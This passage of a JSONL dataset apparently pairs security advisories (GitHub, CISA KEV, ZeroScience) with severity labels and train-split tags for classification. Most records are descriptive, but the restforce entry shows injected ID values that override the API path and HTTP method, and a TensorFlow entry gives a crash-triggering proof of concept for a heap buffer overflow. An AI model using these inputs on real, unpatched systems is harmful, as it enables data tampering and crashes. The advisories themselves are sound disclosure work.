(RFD) attack when it sets a \"Content-Disposition\" header in the response where the filename attribute is derived from user supplied input.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-01-21", "split": "train"} -{"id": "36bea9b455862becbebe", "text": "Broken Access Control in Form Framework\n\n### Problem\nDue to improper input validation, attackers can by-pass restrictions of predefined options and submit arbitrary data in the Form Designer backend module of the Form Framework.\n\nIn the default configuration of the Form Framework this allows attackers to explicitly allow arbitrary mime-types for file uploads - however, default _fileDenyPattern_ successfully blocked files like _.htaccess_ or _malicious.php_. Besides that, attackers can persist those files in any writable directory of the corresponding TYPO3 installation.\n\nA valid backend user account with access to the form module is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to Richie Lee who reported this issue and to TYPO3 contributor Ralf Zimmermann who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-003](https://typo3.org/security/advisory/typo3-core-sa-2021-003)", "text_raw": "Broken Access Control in Form Framework\n\n[Severity: HIGH]\n\n\n### Problem\nDue to improper input validation, attackers can by-pass restrictions of predefined options and submit arbitrary data in the Form Designer backend module of the Form Framework.\n\nIn the default configuration of the Form Framework this allows attackers to explicitly allow arbitrary mime-types for file uploads - however, default _fileDenyPattern_ successfully blocked files like _.htaccess_ or _malicious.php_. Besides that, attackers can persist those files in any writable directory of the corresponding TYPO3 installation.\n\nA valid backend user account with access to the form module is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to Richie Lee who reported this issue and to TYPO3 contributor Ralf Zimmermann who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-003](https://typo3.org/security/advisory/typo3-core-sa-2021-003)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-23", "split": "train"} -{"id": "8846d349d95e8e7ee539", "text": "Unrestricted Upload of File with Dangerous Type in blueimp-file-upload\n\nUnauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0", "text_raw": "Unrestricted Upload of File with Dangerous Type in blueimp-file-upload\n\n[Severity: CRITICAL]\n\nUnauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-10-22", "split": "train"} -{"id": "00273e33fe3ba2a757ec", "text": "restforce vulnerable to Improper Input Validation\n\nA flaw in how restforce constructs URLs may allow an attacker to inject additional parameters into Salesforce API requests.\n\nImpact\n------\nThis flaw is only exploitable in applications that pass user input directly to restforce's select, find, describe, update, upsert, and destroy methods.\n\nVulnerable code might look like:\n```ruby\n client.select('SomeSalesForceObject', params[:some-id],\n ...)\n```\n\nIn such an application, attackers could pass `0016000000MRatd/describe` as a request parameter, causing the server to make a request to a different endpoint than the server is designed to handle. Since the Salesforce REST API supports overriding HTTP methods via a request parameter, an attacker could also cause the client's `select()` method to modify data, by passing `0016000000MRatd/?_HttpMethod=PATCH&other-query-params=...`.\n\nWorkarounds\n------\nIf possible, applications should track salesforce IDs internally, rather than passing user-supplied IDs to salesforce. Such practice mitigates this vulnerability, and in general is desirable for ensuring strong access control.", "text_raw": "restforce vulnerable to Improper Input Validation\n\n[Severity: CRITICAL]\n\nA flaw in how restforce constructs URLs may allow an attacker to inject additional parameters into Salesforce API requests. \n\nImpact\n------\nThis flaw is only exploitable in applications that pass user input directly to restforce's select, find, describe, update, upsert, and destroy methods. \n\nVulnerable code might look like:\n```ruby\n client.select('SomeSalesForceObject', params[:some-id],\n ...)\n```\n\nIn such an application, attackers could pass `0016000000MRatd/describe` as a request parameter, causing the server to make a request to a different endpoint than the server is designed to handle. Since the Salesforce REST API supports overriding HTTP methods via a request parameter, an attacker could also cause the client's `select()` method to modify data, by passing `0016000000MRatd/?_HttpMethod=PATCH&other-query-params=...`.\n\nWorkarounds\n------\nIf possible, applications should track salesforce IDs internally, rather than passing user-supplied IDs to salesforce. Such practice mitigates this vulnerability, and in general is desirable for ensuring strong access control.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-08-03", "split": "train"} -{"id": "42825264142248cd334b", "text": "Exposure of Sensitive Information to an Unauthorized Actor\n\nShopware is an open source eCommerce platform. Versions prior to 5.6.10 are vulnerable to system information leakage in error handling. Users are recommend to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor\n\n[Severity: MEDIUM]\n\nShopware is an open source eCommerce platform. Versions prior to 5.6.10 are vulnerable to system information leakage in error handling. Users are recommend to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-08", "split": "train"} -{"id": "a893175b39384da5323d", "text": "Ivanti Pulse Connect Secure Use-After-Free Vulnerability\n\nAffected: Ivanti Pulse Connect Secure\n\nIvanti Pulse Connect Secure contains a use-after-free vulnerability that allow a remote, unauthenticated attacker to execute code via license services.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-287\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Ivanti Pulse Connect Secure Use-After-Free Vulnerability\n\nAffected: Ivanti Pulse Connect Secure\n\nIvanti Pulse Connect Secure contains a use-after-free vulnerability that allow a remote, unauthenticated attacker to execute code via license services.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-287\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "482f172f9d821623a9d6", "text": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway XSS Vulnerabilities", "text_raw": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway XSS Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-07-17", "split": "train"} -{"id": "20bc5ec436b9ccb12a10", "text": "Deserialization of untrusted data in Jackson Databind\n\nFasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).", "text_raw": "Deserialization of untrusted data in Jackson Databind\n\n[Severity: HIGH]\n\nFasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-06-18", "split": "train"} -{"id": "0cc6cb2398803b1fc283", "text": "Accellion FTA OS Command Injection Vulnerability\n\nAffected: Accellion FTA\n\nAccellion FTA contains an OS command injection vulnerability exploited via a local web service call.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20, CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Accellion FTA OS Command Injection Vulnerability\n\nAffected: Accellion FTA\n\nAccellion FTA contains an OS command injection vulnerability exploited via a local web service call.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20, CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "dd0a100f0f48d9094482", "text": "Regular expression denial of service in codemirror\n\nThis affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2.\n The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/*.*?*/)*", "text_raw": "Regular expression denial of service in codemirror\n\n[Severity: MEDIUM]\n\nThis affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2.\n The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/*.*?*/)*", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "1ad19cfee530211f0b06", "text": "os_str_bytes relies on undefined behavior of `char::from_u32_unchecked`\n\nThe Windows implementation of this crate relied on the behavior of std::char::from_u32_unchecked when its safety clause is violated. Even though this worked with Rust versions up to 1.42 (at least), that behavior could change with any new Rust version, possibly leading a security issue.\n\nThe flaw was corrected in version 2.0.0.", "text_raw": "os_str_bytes relies on undefined behavior of `char::from_u32_unchecked`\n\n[Severity: HIGH]\n\nThe Windows implementation of this crate relied on the behavior of std::char::from_u32_unchecked when its safety clause is violated. Even though this worked with Rust versions up to 1.42 (at least), that behavior could change with any new Rust version, possibly leading a security issue.\n\nThe flaw was corrected in version 2.0.0.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "ad7be7719baa89f5c95b", "text": "Heap buffer overflow in `MaxPool3DGradGrad`\n\n### Impact\nThe implementation of `tf.raw_ops.MaxPool3DGradGrad` is vulnerable to a heap buffer overflow:\n\n```python\nimport tensorflow as tf\n\nvalues = [0.01] * 11\norig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32)\norig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32)\ngrad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32)\nksize = [1, 1, 1, 1, 1]\nstrides = [1, 1, 1, 1, 1]\npadding = \"SAME\"\n\ntf.raw_ops.MaxPool3DGradGrad(\n orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize,\n strides=strides, padding=padding)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/596c05a159b6fbb9e39ca10b3f7753b7244fa1e9/tensorflow/core/kernels/pooling_ops_3d.cc#L694-L696) does not check that the initialization of `Pool3dParameters` completes successfully:\n\n```cc\nPool3dParameters params{context, ksize_, stride_,\n padding_, data_format_, tensor_in.shape()};\n```\n\nSince [the constructor](https://github.com/tensorflow/tensorflow/blob/596c05a159b6fbb9e39ca10b3f7753b7244fa1e9/tensorflow/core/kernels/pooling_ops_3d.cc#L48-L88) uses `OP_REQUIRES` to validate conditions, the first assertion that fails interrupts the initialization of `params`, making it contain invalid data. In turn, this might cause a heap buffer overflow, depending on default initialized values.\n\n### Patches\nWe have patched the issue in GitHub commit [63c6a29d0f2d692b247f7bf81f8732d6442fad09](https://github.com/tensorflow/tensorflow/commit/63c6a29d0f2d692b247f7bf81f8732d6442fad09).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "text_raw": "Heap buffer overflow in `MaxPool3DGradGrad`\n\n[Severity: LOW]\n\n### Impact\nThe implementation of `tf.raw_ops.MaxPool3DGradGrad` is vulnerable to a heap buffer overflow: \n\n```python\nimport tensorflow as tf\n\nvalues = [0.01] * 11\norig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32)\norig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32)\ngrad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32)\nksize = [1, 1, 1, 1, 1]\nstrides = [1, 1, 1, 1, 1]\npadding = \"SAME\"\n\ntf.raw_ops.MaxPool3DGradGrad(\n orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize,\n strides=strides, padding=padding)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/596c05a159b6fbb9e39ca10b3f7753b7244fa1e9/tensorflow/core/kernels/pooling_ops_3d.cc#L694-L696) does not check that the initialization of `Pool3dParameters` completes successfully:\n\n```cc\nPool3dParameters params{context, ksize_, stride_,\n padding_, data_format_, tensor_in.shape()};\n```\n\nSince [the constructor](https://github.com/tensorflow/tensorflow/blob/596c05a159b6fbb9e39ca10b3f7753b7244fa1e9/tensorflow/core/kernels/pooling_ops_3d.cc#L48-L88) uses `OP_REQUIRES` to validate conditions, the first assertion that fails interrupts the initialization of `params`, making it contain invalid data. In turn, this might cause a heap buffer overflow, depending on default initialized values.\n\n### Patches\nWe have patched the issue in GitHub commit [63c6a29d0f2d692b247f7bf81f8732d6442fad09](https://github.com/tensorflow/tensorflow/commit/63c6a29d0f2d692b247f7bf81f8732d6442fad09).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "a1586ce1910658e8bf60", "text": "Denial of Service in mqtt-packet\n\nVersions of `mqtt-packet` prior to 3.4.6, or 4.x prior to 4.0.5 are affected by a denial of service vulnerability wherein specific sequences of MQTT packets can crash the application.\n\n## Recommendation\n\nVersion 3.x: Update to version 3.4.6 or later.\nVersion 4.x: Update to version 4.0.5 or later.", "text_raw": "Denial of Service in mqtt-packet\n\n[Severity: HIGH]\n\nVersions of `mqtt-packet` prior to 3.4.6, or 4.x prior to 4.0.5 are affected by a denial of service vulnerability wherein specific sequences of MQTT packets can crash the application.\n\n\n\n\n## Recommendation\n\nVersion 3.x: Update to version 3.4.6 or later.\nVersion 4.x: Update to version 4.0.5 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "01768e2bc84071e7a61b", "text": "Email relay in Apache Traffic Control\n\nAn authenticated Apache Traffic Control Traffic Ops user with Portal-level privileges can send a request with a specially-crafted email subject to the /deliveryservices/request Traffic Ops endpoint to send an email, from the Traffic Ops server, with an arbitrary body to an arbitrary email address. Apache Traffic Control 5.1.x users should upgrade to 5.1.3 or 6.0.0. 4.1.x users should upgrade to 5.1.3.", "text_raw": "Email relay in Apache Traffic Control\n\n[Severity: MEDIUM]\n\nAn authenticated Apache Traffic Control Traffic Ops user with Portal-level privileges can send a request with a specially-crafted email subject to the /deliveryservices/request Traffic Ops endpoint to send an email, from the Traffic Ops server, with an arbitrary body to an arbitrary email address. Apache Traffic Control 5.1.x users should upgrade to 5.1.3 or 6.0.0. 4.1.x users should upgrade to 5.1.3.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-13", "split": "train"} -{"id": "03a0e86d7f4bed37cde2", "text": "ECOA Building Automation System Authorization Bypass / IDOR", "text_raw": "ECOA Building Automation System Authorization Bypass / IDOR\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2021-09-09", "split": "train"} -{"id": "60c2b5537acaa13d7513", "text": "Rails Multisite secure/signed cookies share secrets between sites in a multi-site application\n\n### Impact\nThis vulnerability impacts any Rails applications using `rails_multisite` alongside Rails' signed/encrypted cookies. Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application.\n\n### Patches\nThe issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.", "text_raw": "Rails Multisite secure/signed cookies share secrets between sites in a multi-site application\n\n[Severity: MEDIUM]\n\n### Impact\nThis vulnerability impacts any Rails applications using `rails_multisite` alongside Rails' signed/encrypted cookies. Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application.\n\n### Patches\nThe issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-15", "split": "train"} -{"id": "92e67c21d6a89ded8a9a", "text": "Malicious Package in js-she3\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in js-she3\n\n[Severity: CRITICAL]\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "d726aef7aa8ce08a8a04", "text": "Singleton lacks bounds on Send and Sync.\n\n`Singleton` is meant to be a static object that can be initialized lazily. In\norder to satisfy the requirement that `static` items must implement `Sync`,\n`Singleton` implemented both `Sync` and `Send` unconditionally.\n\nThis allows for a bug where non-`Sync` types such as `Cell` can be used in\nsingletons and cause data races in concurrent programs.\n\nThe flaw was corrected in commit `b0d2bd20e` by adding trait bounds, requiring\nthe contaiend type to implement `Sync`.", "text_raw": "Singleton lacks bounds on Send and Sync.\n\n[Severity: MEDIUM]\n\n`Singleton` is meant to be a static object that can be initialized lazily. In\norder to satisfy the requirement that `static` items must implement `Sync`,\n`Singleton` implemented both `Sync` and `Send` unconditionally.\n\nThis allows for a bug where non-`Sync` types such as `Cell` can be used in\nsingletons and cause data races in concurrent programs.\n\nThe flaw was corrected in commit `b0d2bd20e` by adding trait bounds, requiring\nthe contaiend type to implement `Sync`.\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "35b96a452668063c8e09", "text": "Sandbox escape through template_object in smarty\n\nSandbox protection could be bypassed through access to an internal Smarty object that should have been blocked. Sites that rely on [Smarty Security features](https://www.smarty.net/docs/en/advanced.features.tpl) should upgrade as soon as possible. Please upgrade to 3.1.39 or higher.", "text_raw": "Sandbox escape through template_object in smarty\n\n[Severity: HIGH]\n\nSandbox protection could be bypassed through access to an internal Smarty object that should have been blocked. Sites that rely on [Smarty Security features](https://www.smarty.net/docs/en/advanced.features.tpl) should upgrade as soon as possible. Please upgrade to 3.1.39 or higher.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-02", "split": "train"} -{"id": "c02e6133059d24f0c92a", "text": "Remote Code Execution via traversal in TAL expressions\n\n### Impact\nMost Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use.\n\nBy default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk.\n\n### Patches\nThe problem has been fixed in Zope 5.2 and 4.6.\n\n### Workarounds\nA site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [Zope issue tracker](https://github.com/zopefoundation/Zope/issues)\n* Email us at [security@plone.org](mailto:security@plone.org)", "text_raw": "Remote Code Execution via traversal in TAL expressions\n\n[Severity: HIGH]\n\n### Impact\nMost Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use.\n\nBy default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk.\n\n### Patches\nThe problem has been fixed in Zope 5.2 and 4.6.\n\n### Workarounds\nA site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [Zope issue tracker](https://github.com/zopefoundation/Zope/issues)\n* Email us at [security@plone.org](mailto:security@plone.org)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-18", "split": "train"} -{"id": "6e320baa7babd0b98017", "text": "Secret disclosure when containing characters that become URI encoded\n\n### Impact\n\nSecrets that would normally be masked by `semantic-release` can be accidentally disclosed if they contain characters that become encoded when included in a URL.\n\n### Patches\n\nFixed in v17.2.3\n\n### Workarounds\n\nSecrets that do not contain characters that become encoded when included in a URL are already masked properly.", "text_raw": "Secret disclosure when containing characters that become URI encoded\n\n[Severity: HIGH]\n\n### Impact\n\nSecrets that would normally be masked by `semantic-release` can be accidentally disclosed if they contain characters that become encoded when included in a URL.\n\n### Patches\n\nFixed in v17.2.3\n\n### Workarounds\n\nSecrets that do not contain characters that become encoded when included in a URL are already masked properly.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-11-18", "split": "train"} -{"id": "e61c8d758477bfdf1dc8", "text": "Cross-Site Scripting in dojo\n\nAffected versions of `dojo` are susceptible to a cross-site scripting vulnerability in the `dijit.Editor` and `textarea` components, which execute their contents as Javascript, even when sanitized.\n\n## Recommendation\n\nUpdate to version 1.1.0 or later.", "text_raw": "Cross-Site Scripting in dojo\n\n[Severity: MEDIUM]\n\nAffected versions of `dojo` are susceptible to a cross-site scripting vulnerability in the `dijit.Editor` and `textarea` components, which execute their contents as Javascript, even when sanitized.\n\n\n## Recommendation\n\nUpdate to version 1.1.0 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "396c121c05b9ab85ee76", "text": "Potential Command Injection in printer\n\nVersions 0.0.1 and earlier of `printer` are affected by a command injection vulnerability resulting from a failure to sanitize command arguments properly in the `printDirect()` function.\n\n## Recommendation\n\nUpdate to version 0.0.2 or later.", "text_raw": "Potential Command Injection in printer\n\n[Severity: CRITICAL]\n\nVersions 0.0.1 and earlier of `printer` are affected by a command injection vulnerability resulting from a failure to sanitize command arguments properly in the `printDirect()` function. \n\n\n\n## Recommendation\n\nUpdate to version 0.0.2 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2017-11-28", "split": "train"} -{"id": "4671c75f2944695eda2a", "text": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Spark via crafted URL\n\nIn Apache Spark 2.1.0 to 2.1.2, 2.2.0 to 2.2.1, and 2.3.0, it's possible for a malicious user to construct a URL pointing to a Spark cluster's UI's job and stage info pages, and if a user can be tricked into accessing the URL, can be used to cause script to execute and expose information from the user's view of the Spark UI. While some browsers like recent versions of Chrome and Safari are able to block this type of attack, current versions of Firefox (and possibly others) do not.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Spark via crafted URL\n\n[Severity: MEDIUM]\n\nIn Apache Spark 2.1.0 to 2.1.2, 2.2.0 to 2.2.1, and 2.3.0, it's possible for a malicious user to construct a URL pointing to a Spark cluster's UI's job and stage info pages, and if a user can be tricked into accessing the URL, can be used to cause script to execute and expose information from the user's view of the Spark UI. While some browsers like recent versions of Chrome and Safari are able to block this type of attack, current versions of Firefox (and possibly others) do not.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-03-14", "split": "train"} -{"id": "15a63cda9963250da95c", "text": "bootstrap Cross-site Scripting vulnerability\n\nIn Bootstrap before 3.4.0, XSS is possible in the affix configuration target property.", "text_raw": "bootstrap Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nIn Bootstrap before 3.4.0, XSS is possible in the affix configuration target property.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-01-17", "split": "train"} -{"id": "e3948a675fbae14599e8", "text": "Hero Framework 3.69 Remote Reflected Cross-Site Scripting Vulnerability", "text_raw": "Hero Framework 3.69 Remote Reflected Cross-Site Scripting Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-12-01", "split": "train"} -{"id": "80889e8ac9976f3a995a", "text": "Remote Code Execution in esigate-core\n\nesigate.org esigate version 5.2 and earlier contains a CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in ESI directive with user specified XSLT that can result in Remote Code Execution. This attack appear to be exploitable via Use of another weakness in backend application to reflect ESI directives. This vulnerability appears to have been fixed in 5.3.", "text_raw": "Remote Code Execution in esigate-core\n\n[Severity: CRITICAL]\n\nesigate.org esigate version 5.2 and earlier contains a CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in ESI directive with user specified XSLT that can result in Remote Code Execution. This attack appear to be exploitable via Use of another weakness in backend application to reflect ESI directives. This vulnerability appears to have been fixed in 5.3.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-12-21", "split": "train"} -{"id": "64f0ec9888c7d1e7285d", "text": "livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)\n\nlivehelperchat is vulnerable to Cross-Site Request Forgery (CSRF).", "text_raw": "livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)\n\n[Severity: MEDIUM]\n\nlivehelperchat is vulnerable to Cross-Site Request Forgery (CSRF).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-17", "split": "train"} -{"id": "9100fd932b2c0786e909", "text": "Google Chromium V8 Incorrect Implementation Vulnerabililty\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains an inappropriate implementation vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Google Chromium V8 Incorrect Implementation Vulnerabililty\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains an inappropriate implementation vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "490f01f4329dfb75996c", "text": "Missing validation during checkpoint loading\n\n### Impact\nAn attacker can trigger undefined behavior, integer overflows, segfaults and `CHECK`-fail crashes if they can change saved checkpoints from outside of TensorFlow.\n\nThis is because the checkpoints loading infrastructure is missing validation for invalid file formats.\n\n### Patches\nWe have patched the issue in GitHub commits [b619c6f865715ca3b15ef1842b5b95edbaa710ad](https://github.com/tensorflow/tensorflow/commit/b619c6f865715ca3b15ef1842b5b95edbaa710ad), [e8dc63704c88007ee4713076605c90188d66f3d2](https://github.com/tensorflow/tensorflow/commit/e8dc63704c88007ee4713076605c90188d66f3d2), [368af875869a204b4ac552b9ddda59f6a46a56ec](https://github.com/tensorflow/tensorflow/commit/368af875869a204b4ac552b9ddda59f6a46a56ec), and [abcced051cb1bd8fb05046ac3b6023a7ebcc4578](https://github.com/tensorflow/tensorflow/commit/abcced051cb1bd8fb05046ac3b6023a7ebcc4578).\n\nThese fixes will be included in TensorFlow 2.7.0. We will also cherrypick these commits on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information \nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "text_raw": "Missing validation during checkpoint loading\n\n[Severity: HIGH]\n\n### Impact\nAn attacker can trigger undefined behavior, integer overflows, segfaults and `CHECK`-fail crashes if they can change saved checkpoints from outside of TensorFlow.\n\nThis is because the checkpoints loading infrastructure is missing validation for invalid file formats.\n\n### Patches\nWe have patched the issue in GitHub commits [b619c6f865715ca3b15ef1842b5b95edbaa710ad](https://github.com/tensorflow/tensorflow/commit/b619c6f865715ca3b15ef1842b5b95edbaa710ad), [e8dc63704c88007ee4713076605c90188d66f3d2](https://github.com/tensorflow/tensorflow/commit/e8dc63704c88007ee4713076605c90188d66f3d2), [368af875869a204b4ac552b9ddda59f6a46a56ec](https://github.com/tensorflow/tensorflow/commit/368af875869a204b4ac552b9ddda59f6a46a56ec), and [abcced051cb1bd8fb05046ac3b6023a7ebcc4578](https://github.com/tensorflow/tensorflow/commit/abcced051cb1bd8fb05046ac3b6023a7ebcc4578).\n\nThese fixes will be included in TensorFlow 2.7.0. We will also cherrypick these commits on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information \nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "ae8c778998d11962100f", "text": "A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0611.", 